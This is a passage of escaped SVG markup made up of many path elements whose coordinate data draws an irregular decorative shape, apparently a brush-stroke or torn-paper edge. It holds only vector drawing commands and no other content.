d=\"M195.9,51a15.4,15.4,0,0,1,2.8.1c-.2-.2.8-.3,2.5-.3.1.1.3.1,1.5.1l-.2-.2a27.48,27.48,0,0,1-3-.2C201.7,51,190.3,50.6,195.9,51Z\"></path>\n        <path d=\"M357.8,51.8c1.1,0,1.7.1,1.6.3-2.5-.1-8.2,0-4,.2C358.7,52.4,363.6,51.7,357.8,51.8Z\"></path>\n        <path d=\"M340.4,51c4,.3-3.5.5.7.8l3.7-.6C341.1,51.3,341.6,50.6,340.4,51Z\"></path>\n        <path d=\"M292.6,50.3c0-.1.1-.1,1.3-.1.9,0,1.7,0,1.3-.1-1.7-.1-1.7-.2-1.7-.4,4.9.3,5.2.1,5.5-.1,3.1.2,8.5.2,7.5.6,5.6-.1,6.9-.6,10.4-.9-6.6-.1-5.6.5-12.2.4,1-.4-8-.2-7.5-.6-.4-.5,6,.1,5.3-.3-.5-.4-4.5.1-4.3-.2,4.5-.1-3.2-.3-1.9-.6.8,0,5.2-.2,5.7.1s-1.7.2-2.5.3c2.5,0,4.4.1,5.8.2-.6-.4.5-1.1-7-1.7-3.2.2,2.3.3,1.9.6-5.6.2-7.9,0-4.5-.4-5.8-.1-4.5.5-.7.7a20.82,20.82,0,0,0-4.1.1c1.7.1,4,.1,4.4.2.2.2-.8.3-2.5.3-2.3-.3-4.8-.5-7.6-.7-2.3.1,4.4.8,6.2.7,0,.3,2.5.4,3.3.6-5.3-.1,1.5.5-4.1.1C294.3,49.7,288.5,50,292.6,50.3Z\"></path>\n        <path d=\"M276.4,49.3c3.4-.1,7.9-.1,9.4-.3C281.2,49,277,49,276.4,49.3Z\"></path>\n        <path d=\"M339.8,50.3c1.2-.2-5.2-.6-5.9-.4,6.9.2-.1.3-1,.4C337.4,50.6,335.4,50.1,339.8,50.3Z\"></path>\n        <path d=\"M297.3,41.5c-1-.4-5.8-.9.4-1.1-7.9-.1-5.8-.8-9.4-1.2-7.5.2,8.4,1.2-.1,1.4a7.8,7.8,0,0,0-3-.3c-1.3.5,3.6,1.6-6.9,1.6,5.2.4,5.1.7-.7.7a114.26,114.26,0,0,0,13.6-.3c.3.2,4.8.2,4.5.4a32.67,32.67,0,0,0-3.8.5c2.5,0,4.4.1,5.8.2.9-.3-2.3-.3-1.9-.6,2.1.1,2.6.2,4.5.3.6-.4-3.4-.5-3.5-.8,2.7.1,4.8.2,5.9.3-2.5.6,10.4,1.4,5.7,1.8,5.7-.1,1.3-.7,3.4-.9-1-.2-6.7-.1-7.3-.4l-.3-.3a62.16,62.16,0,0,1,10.2.6c3-.2-4.4-.5-4.9-.9a16.86,16.86,0,0,1,5.3-.3c2.8.3,6.8.4,9,.7a61.84,61.84,0,0,1-7.2-.3c-.4.6,4.7.3,6.2.7.4.4-1.6.6-3.5.8,1.7.1,4,.1,4.4.2-6.7,1-1.8,2.8-9.1,3.8-1.7-.1-1.7-.2-1.7-.4-2.6,0-4.7,0-5.5.1,3.8.4,9.8.6,14.7.9.7.6-4.8-.1-5.3.3,3.6.3,7,.1,11.3.3-4.6-.5.2-.8-5.2-1.2-1.4.1-.1.4-4,.2a53.56,53.56,0,0,1,7.9-.5c-1.8-.5-2.2-1-1-1.1,2.7-.2,2.8.1,5.8.2.7-.4-7-.4-6.3-.8,2.6,0,4.7,0,5.5-.1-9.7-.1,6.2-.6-2.3-1-1.8.1-.2.5-3.8.5-1.1-.6,3.4-.8,6-1.1-1.7-.1-4-.1-4.3-.2,5.8-.3-1.3-1.1,2.5-1.9-6.6-.2-3-.4-3.4-.7-4.4-.2-4,.1-8.4-.1,2.7.5-.6.2-5.3.3-2.4-.8-9.2-1.2-14.1-1.8C297.4,40.6,302.3,41.3,297.3,41.5Z\"></path>\n        <path d=\"M333.6,49.5c1.7,0-1.4-.5,5.4-.2,0,.2.7.4,1.6.3-.1-.2-.9-.3-1.7-.4-4.5-.2-5.3.1-8.5-.2C330.8,49.2,329.4,49.5,333.6,49.5Z\"></path>\n        <path d=\"M367.4,48.5a78.32,78.32,0,0,0-8.1.3c.9.1,5.7.4,5.7.1C359.8,48.6,368.4,48.8,367.4,48.5Z\"></path>\n        <path d=\"M275.4,46.6c4.2.1,10.6-.1,8.1-.3-2.5,0-3.7.2-6.8.2-.3-.2-.1-.4-3.1-.4C273.4,46.3,275.4,46.4,275.4,46.6Z\"></path>\n        <path d=\"M302.7,46a24.32,24.32,0,0,1,2.7,0,4,4,0,0,0,1.6.3c-.1-.5,2.2-.9-5.1-1.1C304.7,45.5,302.5,45.9,302.7,46Z\"></path>\n        <path d=\"M284.4,44.2c-5-.1-4.1.3-6.6.4,2.4,0,3.8.2,4.3.1C277.9,44.4,286.3,44.5,284.4,44.2Z\"></path>\n        <path d=\"M364.1,44.8c-.4.3,2.8.3,1.9.6,7.1.2.5-.3,3.9-.4,3.2,0,1.9.4,4.5.4C375,44.8,366.4,45,364.1,44.8Z\"></path>\n        <path d=\"M14.4,32.6l.2.2c8.3.1,1.3.7,3.6,1,0-.1.1-.1,1.3-.1.3.1,0,.3,1.7.4,2-.4-1.8-.9-2.7-1.5Z\"></path>\n        <path d=\"M331.4,40.7c3.3.2,4.1-.4,7,0a20.27,20.27,0,0,0-2.7,0c9,0,1.7-.5,3.4-.9a61.71,61.71,0,0,0-6.8.2C338.5,40.4,332.5,40.6,331.4,40.7Z\"></path>\n        <path d=\"M275.3,38.6c5,.3-1,.6,6.2.8-.7-.3-3.2-.5-.6-.7C277.9,38.8,275.4,38.3,275.3,38.6Z\"></path>\n        <path d=\"M291.1,39.2c-.1-.1-.2-.3-.4-.4-2.1-.1-7.2,0-7.2-.3,1.2.1,2.7-.7-.8-.9-3,.3,2.4.9-2,.9C284.8,38.7,286.3,39,291.1,39.2Z\"></path>\n        <path d=\"M347,39.6c2.6-.2-1.3-.5,1.4-.7-3.9.2-6.5,0-7.2.4C343.2,39.4,344.1,39.5,347,39.6Z\"></path>\n        <path d=\"M284.9,36.9c1.6.1,10.2.7,8.8.5-4.1-.2-.6-.5.9-.5a33.9,33.9,0,0,1-4.5-.3c-2.5.1,2.2.4-2.4.4C286.1,36.9,285.4,36.7,284.9,36.9Z\"></path>\n        <path d=\"M339.4,37.2c1.1,0-2.9-1.2-3.7-1.1C335.2,36.9,335.9,36.8,339.4,37.2Z\"></path>\n        <path d=\"M356.1,37.3c-1.7-.1-1-.1-.2-.2a82.15,82.15,0,0,0-9.8-.1C348.7,37,355,37.3,356.1,37.3Z\"></path>\n        <path d=\"M328.3,34c3.8-.4,6.4.2,11.2.1C338.9,33.6,326.7,33.5,328.3,34Z\"></path>\n        <path d=\"M341.4,33.2c-.6-.5,9.6-.7,1.7-1.2C347.4,32.8,335.6,32.6,341.4,33.2Z\"></path>\n        <path d=\"M145.4,77.3a2.39,2.39,0,0,0-.5-.6c-3.8-.3-4.9,0-7.2-.3.2-.2,2.2-.2,5.5-.1a19.89,19.89,0,0,0-6.5-1c1.7.7-4,.9.2,1.7C141,77.1,141.2,77.1,145.4,77.3Z\"></path>\n        <path d=\"M231.3,75.4c-6.2-.2-7.8-.1-11.1,0,.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3C224.8,75.5,229.3,75.9,231.3,75.4Z\"></path>\n        <path d=\"M212.5,69.8c-5.6.1-.3.7,2.3,1-.2.1-1.4.1-2.6.2-2.3-.1-.1-.5-4.6-.5,2.2.8.8.9-.1,1.4,5.7-.4,8.1.4,12.8.3-4.8-.3,8.1-.3,2.2-.7-2.2.2-5.9-.6-3.5-.8-2.1-.3-5.2,0-5.8-.2-2.3-.5,2.4-.5,5.4-.2a81.66,81.66,0,0,0-11.9-.9C205.7,69.6,211.8,69.6,212.5,69.8Z\"></path>\n        <path d=\"M173,70.8c.1,0,.1-.1,0,0C173,70.7,172.9,70.8,173,70.8Z\"></path>\n        <path d=\"M178.1,68.7c-11-.1-4.3,1.3-5.1,2a18.73,18.73,0,0,1,4.1,0c-4.4.4,3.2,1.3,3,1.8,1.1-.6,2.6-1.4-1.7-1.9,3.6-.1,2.4-.3.8-.6,2.5,0,4.5.1,5.8.2a66.74,66.74,0,0,0-11-1.4C176.3,68.9,179,69,178.1,68.7Z\"></path>\n        <path d=\"M1494.6,118.8c1.9.1,2.8.2,5.8.2,1.1-.1,1.6-.3.9-.5C1497.4,118.5,1497.6,118.8,1494.6,118.8Z\"></path>\n        <path d=\"M1495.9,117.1c1.1.5-1.1,1.2,5.3,1.3C1500.3,118,1504.4,117.5,1495.9,117.1Z\"></path>\n        <path d=\"M1463.9,110.8c-6.5-.3-4.6.5-.9.5C1462.3,111.1,1462.9,110.9,1463.9,110.8Z\"></path>\n        <path d=\"M1495,109.8c-2.4.1-.2.6,2.1.8C1496,110.3,1498.2,109.9,1495,109.8Z\"></path>\n        <path d=\"M1692,112.7c.1.8-2.5-.3-7.2-.3a38.09,38.09,0,0,0,6.3.8,10.17,10.17,0,0,1,2.7,0C1693.4,113,1693.9,112.7,1692,112.7Z\"></path>\n        <path d=\"M1463,106.5c-4.5-.1-4.6.2-5.2.4a16.67,16.67,0,0,0,4.7.7c.9-.3-2.5-.4-3.3-.6,3.2.1,5.3.1,5.5-.1C1463,106.8,1463,106.7,1463,106.5Z\"></path>\n        <path d=\"M1472.4,99.9c-3-.2-1.8,0-5.7-.1,1,.3,1.1,1.1-3.7.6,6.8,0-.4-.9,3.2-1.1a38.82,38.82,0,0,0,5.9.3c-1.2-.4-.2-.3-4.7-.7,1.8-.3,6.5.4,5.5-.1-.2-.4-4.4,0-3.3-.6,4.3.3,3.6-1-2.5-1.3,0,.5-1.5.6,2.3,1-11.1,1.2-12.1,3.5-6.2,5.5-2.9.1-2.9.4-5.1.5,4.5.8-4.6,2,4.8,2.3-2.8-1,1.5-2.4.9-3.7-.3-.6-4.1-1.4,1.4-1.5-.3.1-1.8.2-1,.4,8.9.1-.5-.8,3.4-.9.9.4,3.9.2,1.9.6,3.8.1,3.5-.1,3.9-.3C1470.8,100.6,1469.7,99.9,1472.4,99.9Z\"></path>\n        <path d=\"M1701.7,100a23.82,23.82,0,0,1-2.8-.1,20.27,20.27,0,0,0-2.7,0c-3.3,1.9-8,3.1-7.5,5.7,2.3.2,6.1.3,7.5.6-7.8-.4-.8.9-8.1.3-.7.5-.9.9,2.6,1.4-1.6-.6,3.5-.1,5.6,0-.3-.2,0-.3,1-.4-2.4-.3-6.1-.2-7.3-.4,1.5-.4,4.7-.2,9.3-.4-3.1-.5.2-.5.6-.9-8.1-.2-1.1-.8-5.2-1.2,1.8,0,1.8-.1,4.2,0-2.2-.4-.9-.8.4-1.1-1.7-.1-3.3-.2-4.5-.3C1701.6,102.1,1696.9,100.8,1701.7,100Z\"></path>\n        <path d=\"M1710.2,106.5c-3.6-.1-5.3,0-5.3.3,2.6.1,3.1.2,1.6.3,1.4,0,2.8.1,4.2.1C1709.2,106.8,1709.2,106.8,1710.2,106.5Z\"></path>\n        <path d=\"M1705,103.8c1.4.4-1.3.5-.6.9C1710.6,104.9,1709.3,103.9,1705,103.8Z\"></path>\n        <path d=\"M1697.2,99.7c-.1-.4,2.4-.6,6.4-.6C1698.4,98.6,1692,99.5,1697.2,99.7Z\"></path>\n        <path d=\"M1653.7,97.6c1.4.4-5.1.7-.4,1.1C1652.9,98.3,1657.8,98,1653.7,97.6Z\"></path>\n        <path d=\"M1326.8,90.8c1.4,0,2.8.1,4.2.1.4-.2,2.7-.5-2-.7C1328.4,90.4,1325.8,90.4,1326.8,90.8Z\"></path>\n        <path d=\"M1684,97.3c0,.3.9.6,3.4.7C1686.4,97.8,1689.1,97.3,1684,97.3Z\"></path>\n        <path d=\"M1696.1,95.3c10.3.3.8-.7,4.6-1.1C1692.8,94.2,1699.1,94.9,1696.1,95.3Z\"></path>\n        <path d=\"M1742,95.2c-1.3.1-2.4.6.7.8C1743.9,96,1745,95.4,1742,95.2Z\"></path>\n        <path d=\"M1715.4,93.4c1.1.1,2.8.1,3,.2-1.1,0-1.6.1-1.2.2,3.8.1,3.5-.1,3.9-.3C1717.4,93.4,1716.3,93.1,1715.4,93.4Z\"></path>\n        <path d=\"M1742.4,91c.9.2-1.1.5,1.9.6C1746.4,91.5,1748.7,91.1,1742.4,91Z\"></path>\n        <path d=\"M1711.2,90.3c2-.1,1.8-.7-3.4-.7C1709.3,89.8,1708.8,90.1,1711.2,90.3Z\"></path>\n        <path d=\"M1741.4,88.2c-3.6-.1-5.1.5-2.2.6C1739.7,88.6,1742.4,88.6,1741.4,88.2Z\"></path>\n        <path d=\"M1738,87.6a8.94,8.94,0,0,0,3.2.5c.3-.2,1.5-.5-.6-.7A6.92,6.92,0,0,1,1738,87.6Z\"></path>\n        <path d=\"M1729.4,85.7c-.9.3,2.5.4,4.7.5C1735.7,85.9,1734.6,85.6,1729.4,85.7Z\"></path>\n        <path d=\"M1877.1,86.3c4,.1,3.8-.2,3.7-.5C1876.4,85.7,1876.5,86,1877.1,86.3Z\"></path>\n        <path d=\"M1704.4,77.8c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C1708.1,77.7,1703,77.4,1704.4,77.8Z\"></path>\n        <path d=\"M1724.7,72.5a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C1726,73.3,1728.1,72.7,1724.7,72.5Z\"></path>\n        <path d=\"M1811.9,73.8c0,.2-3.8.8,2.2.9C1813,74.4,1815.2,73.9,1811.9,73.8Z\"></path>\n        <path d=\"M1705.8,71.5c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C1715.2,71.8,1705.3,71.2,1705.8,71.5Z\"></path>\n        <path d=\"M1801.3,72.8c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C1798.9,73,1802.1,73.1,1801.3,72.8Z\"></path>\n        <path d=\"M1719.7,71.5c.2-.2,2.6-.7-1-1.1C1718.2,70.6,1716.4,71.1,1719.7,71.5Z\"></path>\n        <path d=\"M1711.3,69.9c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1C1709.6,69.9,1711.4,70,1711.3,69.9Z\"></path>\n        <path d=\"M1864.6,72c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C1858.3,72,1866.3,72.5,1864.6,72Z\"></path>\n        <path d=\"M1725.4,68.6c.2-.5-1.5-.8-7.8-.9.4.2-.1.4,1.8.5C1723.9,67.7,1721.5,68.5,1725.4,68.6Z\"></path>\n        <path d=\"M1814.1,68.4c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C1812.8,68.6,1813.1,68.5,1814.1,68.4Z\"></path>\n        <path d=\"M1758.3,63.3c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C1755.2,63.5,1762.2,63.7,1758.3,63.3Z\"></path>\n        <path d=\"M1911.3,66.7c3.6-.1,3.2-.7-2.2-.9C1910.8,66.1,1907.6,66.5,1911.3,66.7Z\"></path>\n        <path d=\"M1866.7,65a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C1864.3,65.2,1867.5,65.3,1866.7,65Z\"></path>\n        <path d=\"M1854.4,63.6c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C1858.8,63.6,1857.5,63.7,1854.4,63.6Z\"></path>\n        <path d=\"M1836.4,63.8c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A21.47,21.47,0,0,1,1836.4,63.8Z\"></path>\n        <path d=\"M1810.8,61.5c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A27.87,27.87,0,0,0,1810.8,61.5Z\"></path>\n        <path d=\"M1865.5,60.5c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.15,41.15,0,0,1,1865.5,60.5Z\"></path>\n        <path d=\"M1726.5,52.4c-.3-.4,3.6-.4,5-.7C1725.3,51.5,1722.5,52.1,1726.5,52.4Z\"></path>\n        <path d=\"M1768,50.6a4.37,4.37,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C1766.5,50.4,1764.4,50.9,1768,50.6Z\"></path>\n        <path d=\"M1743.9,50.1c.4-.3,4.1-.4,3.5-.8C1743.5,49.2,1741.8,49.9,1743.9,50.1Z\"></path>\n        <path d=\"M1757.7,48.4c-4.3-.1-5.3.1-8.2.1a10.29,10.29,0,0,0,3.3.6C1753.2,48.8,1758.9,49,1757.7,48.4Z\"></path>\n        <path d=\"M1716.4,47.3c-.8.3-1.1,1,5.2,1.2C1719.6,48.1,1718.9,47.7,1716.4,47.3Z\"></path>\n        <path d=\"M1708.9,48.2c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C1707.1,48.2,1705.9,48,1708.9,48.2Z\"></path>\n        <path d=\"M1777.5,48.8a45.38,45.38,0,0,0,4.9.9C1784.6,49.5,1783.6,48.8,1777.5,48.8Z\"></path>\n        <path d=\"M1861.2,50.9c-1.6.1-5.2.1-7,0C1853.6,51.5,1865.8,51.2,1861.2,50.9Z\"></path>\n        <path d=\"M1742,48c2.5-.2,5-.1,2.3-.5C1740.8,47.3,1738.8,47.8,1742,48Z\"></path>\n        <path d=\"M1786.2,47.8c1,.4,2.4.7,6.4.9C1791.3,48.3,1790.3,48,1786.2,47.8Z\"></path>\n        <path d=\"M1746,46.2c.8-.3,1.6-.6-2.1-.8C1745.5,45.8,1740.4,46,1746,46.2Z\"></path>\n        <path d=\"M1747.7,43.4c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C1744.5,43.1,1745.6,43.3,1747.7,43.4Z\"></path>\n        <path d=\"M1744.9,41.7c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C1749.7,42.1,1747.9,41.8,1744.9,41.7Z\"></path>\n        <path d=\"M1685.2,119.2c-.9.1-5.1.4-.8.6-.1-.1,2.4,0,2.6-.2-1.6-.1-2.3-.2-3-.3C1686.3,119.4,1687.7,119.3,1685.2,119.2Z\"></path>\n        <path d=\"M1686.5,111.1a45.79,45.79,0,0,1,7.4.5,14.06,14.06,0,0,1-3.6-1C1685.9,110.5,1687.6,111,1686.5,111.1Z\"></path>\n        <path d=\"M1699.9,98c-5.9-.4,1.2-.8-5.1-1.1,0,.3,1.9.8-2.2.7a9.4,9.4,0,0,0-3.2-.5c-.3.4,3.6.7,6.1.6.6.2-1.7.2-2.5.3C1695,97.9,1700.4,98.2,1699.9,98Z\"></path>\n        <path d=\"M1453.3,87.6c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A7.86,7.86,0,0,1,1453.3,87.6Z\"></path>\n        <path d=\"M1744.1,85c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C1742.5,85.3,1748.3,85.2,1744.1,85Z\"></path>\n        <path d=\"M1702.2,81.7h0c-9.7.5-1.9,1.9-5.1,2.1,1.6,0,3.3.2,4.9.3a22.85,22.85,0,0,0,3.7,0c-1.6-.1-2.8-.2-3.7-.3-2.9-.4-1.8-1.1,0-1.4a11,11,0,0,1,1.9-.2C1698.9,81.9,1706.6,81.7,1702.2,81.7Z\"></path>\n        <path d=\"M1878.8,85c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C1886.6,85.7,1881.6,85.2,1878.8,85Z\"></path>\n        <path d=\"M1710.6,81.8c-3-.1-1-.4-1.9-.6C1699.7,80.9,1708.5,82.1,1710.6,81.8Z\"></path>\n        <path d=\"M1864.2,74.7c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-7.6.9,3,2.8-3.5,3.8,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.63,41.63,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.15,98.15,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,3.3.1,1.3-.3,4-.2s2.4.6,4.8.8a21.32,21.32,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C1861.8,75.1,1862.3,74.8,1864.2,74.7Z\"></path>\n        <path d=\"M0,0V30.7c.9,0,1.9,0,3.1.1l.4.4c13.8.4,10.5-.4,11.6-1,12.1.7,5.8,1.4,4.9,2.4a27.94,27.94,0,0,0,6.9-.1c8.1.9-6.5,1.7,5.1,2.6.3-.3,1.4-.6,3.4-.9.4,2-2.5,2.8,0,4.8-2-.1-2.5-.2-4.4-.3,1,.5,6,.7,6.7,1.2-1.7,0-4-.1-4.1,0,2.2.1,1.2.3.3.3,4.7.2,1.6-.3,5.4-.2,6.6.8.6,1.5,6.4,2.5-4,.1-3.4.6-6.2.8,6.4.3,8.8.1,11.7.6-6.2.1-12.2.4-17-.4.1.2-3.9,0-4.1.1,7.4.1,6.3.8,6.8,1.4,6.2.1,7.2.9,3.5.8,3.1.2,5.3.4,4.8.8-7,.3-7.5-.5-10.2-.6,1.1.3-1,.8,2.3,1,1.2-.6,2.7.6,8.5.2.2-.2-3.3-.2-4.6-.5,5.4.1,7.6.3,8.9.6-1.4.4-10.5.1-12.4.2,2.4.3-2.8.7,3.8,1.2-4.2-.6,1-1.3,7.6-.8.8.5-5.4,0-5.4.2,1.9.3,5.4,1.1-3.6.7,2.4.5,5.6.5,10.1.4,1,.5-4.4.3-6.9.1,1.3.3-2.6.2-2.4.4,4.3.3,7.7,0,11.3.3-.2.2-3.6.1-5.4.2,1.4.4,5.6.7,5.2,1.2-9.4,0,.6.7-7.5.9,3.5.1,4.3-.1,5.8.2-.2.2-5.2,0-5.4.2,3.5.1,6.9.1,7.3.4-.9,0-1.6,0-1.3.1-1.46-.17-2.93-.27-4.4-.3,5.4,1.5,6.2,1.8-3.4,2.4,6.2.3,4.5.9,2.4,1.1,4.4,0,4.5.3,7.3.4-1.9-.6,3.9-.2,6.9-.1,1.8-.4-.6-.6,2-.9-4.5-.1-3.8-.5-6.2-.7,3.2,0,4.6-.2,6.7-.3-3.4-.1-5.3-.9-3.6-1,3.5.2-.1.8,6.3.8-3.2-.6,1.6-.4,4.1,0,.1-1.4.4-1.3-2.2-2.6,3.3,0,6.2.4,8.6.3-7.9-.4,1.2-.9,1.6-1.4.4.2-.1.4,1.8.5,4.2-.1-.6-.3,3.9-.4a8.16,8.16,0,0,0,2.7,0c-4.5-.3-5.6-.2-8.7-.4.4-.9,2.8-2.3,16-2.4-3.9.4,4,1-1.6,1.4,3.4,0,3.3.3,7.2.3,1.8-.6,1.3-1.1,4-1.8a13.45,13.45,0,0,0,4.2,0c-1.7-.1-3.4-.1-3-.3a13.45,13.45,0,0,0,4.2,0c-2.7,0-5-.6-1.9-.6,1.5.7,8.8.3,11.8.8.5.5-8.1.1-5.2.4.8-.1,4.4.2,5.5-.1.9.2,6,.7,2.1.8a44.26,44.26,0,0,0-8.3,0c4.7-.1,8.5.1,11.3.3.3.5,2.4,1.2-3.2,1.1a55.14,55.14,0,0,0-5.9-.4c-1.8.3,4.9.2,4.5.4.4.2-.2.4,1.8.5,3.3-.1-2.8-.5,2.3-.5-.8.4,2.5.5,2.1.8-4.2-.1-4.1.2-8.3,0,.8-.3-5.5-.3-5.8-.2,2.3,0,1.7.8,4.5.4-1.4,0-2-.2-.2-.2.2.2,4,.2,4.4.3-1.5.1-1.4.4-3.8.5-2.3-.1-1.1-.3-3.1-.4-4.8.2,11.3,1.2-.4,1.1-.9-.2,1.2-.5-1.9-.6-4.3.3.3.8-3.2,1.1,3.2,0,5.4.1,5.9.4-4.2-.1-5.4.3-2.2.6-2.7.2-4.7-.2-7,0,3.8.1,3.6.7,4.8.8,0-.1.2-.3,2.6-.2,2.8.3-.9.3.6.7,5.3.2,2-.4,5.2-.4-.9.6,4.4.2,4.3.2,5.7.4-1.8.6-5.1.5,5.5,0,10.2.6,11.3.1-6-.3,2.2-.4-3.5-.8,3.3.1,5.3.1,5.5-.1-3.1-.3-5.9.1-7.3-.4,1.7-.9,14.3.1,13.1.7,2.7-.2,1.8-.2.8-.6,4.9.5,3.1-.1,5.4-.2,3.3.3-.1,1.1,5.3,1.3-.3-.7-1.8-1.4-.1-1.6,7.8.6,4.1,1.4,9,2.3-3.3-.1-5.3-.1-5.5.1,3,.3,2.4.9,5.2,1.2-6.1-.1-2.8.6-2.1.8,1.2-.1,10.6.2,6.8-.2.6.2-4.1-.1-4.3-.2a7,7,0,0,0-1.7-.4c6.7,0,.8-.6,6.4-.6-2.7-.1-3,.1-5.6,0,3.6-1.1,2.1-1.4,3.7-2.1-5.2-.7-7.4-1.9-2.1-2.3a36.81,36.81,0,0,1-4.2-.1c4.8-.1.5-.5.5-1,2.7,0,6.1.1,5.4-.2-6.8,0-4.7-.6-1.9-.6a15.66,15.66,0,0,1-2.9-.2c4,0,5.7.7,7.3.4-3-.1-.8-.5-4.7-.5-.8.1-2.9.1-5.5.1-.3-.3-.5-.6-.8-.9-4.9.1-7.9-.3-9.6.1,3.4.1,2.9-.1,7,0-.2.3,1.2,1-4.9.8,4.4.1-2.6,1.2,4.9.9,0,.2-.6.4-2.4.4-4.5,0-6.7-.2-10-.3a19.29,19.29,0,0,1-3.7.6c-.2-.2-4-.2-4.4-.3,1.6-.2-4.6-.6-.5-.6,2.7.1,1.3.4,4.5.4-.4-.3,4.2-.2,2.2-.7-7.8-.4-10.8-2-1.4-1.6-3.2-.6-2.8-.8-7.4-.5,2.5-.4.2-1.1-3.7-1.1,2.7,0,.7-.3,4-.2,2.9.1-.3.6,4.7.7,4.1.1-1.9-.8,2.2-.7-.2.3,5.6.2,4.6.5-4.3-.3-4.6.1-2.4.4-2.7-.3-4.9-.1-4,.2a36.19,36.19,0,0,1,8.7.4c-.6-.7,1.3-1.3,1.2-1.8-.5.2-3.1-.4-6-.5-2.6-.9,3.7-.9,1.2-1.8,2.4.4,5.6-.1,7.2.3-4.3-.1-3.3.8-2.1.8a15.37,15.37,0,0,1,2.8.1c-5.2-1.2,11.7-1,9.7,0a52.3,52.3,0,0,0-5.6,0c1.1.3-1.6.7,3.4.7-3-.9,6.9-.1,10.6-.6-.7-.1-6.1-.1-7.4-.5,3.4-.2,8.1.3,9.8.1-2-.4-6.1-.3-8.8-.5.5-.4,4.6-.6,6.9-.1-.5-.3.3-.4,2.3-.5.1.1,2.6.2,3.1.3.2,1-.3,1.7-1.5,2.4.8-.1,2.1-.1,2.2.1-.1.3-1.4.5-3.7.6,5.7.1,3.2.1,3.1.4,2.7.1,3-.1,5.6,0,.4.7,4.7,1.3,0,1.5a82.23,82.23,0,0,0-11.1,0c-5.7-.9,2-1.7-.7-2.3-3.4.1-2.3.7-6.3.7-.4-.8,7-.9,7.1-1.4a73,73,0,0,0-12,.6c-8.2,0-2.8-1-11-1.4,1.3.6,3.9,1.3,10,1.9-6.8.2-5.2.7-7.2,1.3,5.5-.1.8-.3,8.4.1,1.7-.2-4-.5-.4-.4s2.8.6,6.3.8c-2.3.2-2.9.3-.8.6,3.4.1,5.3-.5,9.7,0-3.8.4.5.2,2,.7-1.3.3-4.8-.1-5.3.3,4.5,0,8.1.8,4.9.9-2.7-.1-1.3-.4-4.3-.2,6.3.5,1.5.8,7.8.9-4.2.4,2,.7-1.8,1.2,3.7.2,4.4,0,5.8.2-4.6.2,6.1.7.8.9-.3-.1,0-.3-1.7-.4,2,.7-5.3-.1-5.3.3,9.2.5,10.2,2.1-3,1.4,1-.2-1.8-.7-3.1-.4,2.1.1,1.5.3,1.8.5,7.2.4,11.5.7,7.9,1.1-1.6-.1-6.9-.6-8.6-.3,7,.2-1.4.4-.8.6a53.87,53.87,0,0,1,8.8.5c2.1,0,5.4-.4,6.8-.2.1.3-2.3.3.5.6-1.9,0-3.8-.1-5.7-.1,8.3,1.1,3.6,1.5,2.1,2.3,5.1.2.2.4,3.3.6a13.76,13.76,0,0,1,4.1-.1c1.5.5-6.6.4-2,.9-3.2-.1-5.3-.1-5.5.1,5.4.1,1.4.5,7.3.4-2.8.2.7.4,2,.7,4.9-1.5-2.8-3.3,4.1-4.8a36.81,36.81,0,0,1-4.2-.1c-.9-.5,4.3-.6,1.8-1.2-6.7-.2,1.3.4-2.5.3-5.1-.5-2.2-.8-2.6-1.4a43.87,43.87,0,0,0,5.5-.1c-.8.4-6.2.4-.6.8-.5-.3,3.8-.6.7-.9,1.2-.1,1.3-.3-.4-.5.1.3-4.7-.1-4.4-.2,2.8-.3-3.1-.7,2.1-.7.5.4-.6.8,4.9.9-.1-.7-1.3-1,1.7-1.3-3.1,0-4.6-.2-4.5-.4,7.5-.2-1.9-1.3-4.2-1.6,3.7-.1,5.6-.3,7.9-.5a36.81,36.81,0,0,1-4.2-.1c0-.3,3.3-.4,5.1-.5-7.7-.2-3-.4-6.4-1,2,.1,2.5.2,4.4.3.6-.4-2.7-1.1.3-1.2a33.79,33.79,0,0,1,4.5.3c1.4-.1.1-.4,4-.2-1.5-.2-1-.6-3.4-.7-3,.1-2.7.6-7.9.5,1.7-.4,2.9-.1-1.8-.5,4.1,0,4.6-.5,8.4.1-.2-.3-1.4-.7,2.3-.6,1.3.3,3.4.5,3.5.8a43.14,43.14,0,0,1,8.8.5c1.9-.3-1.5-.6-4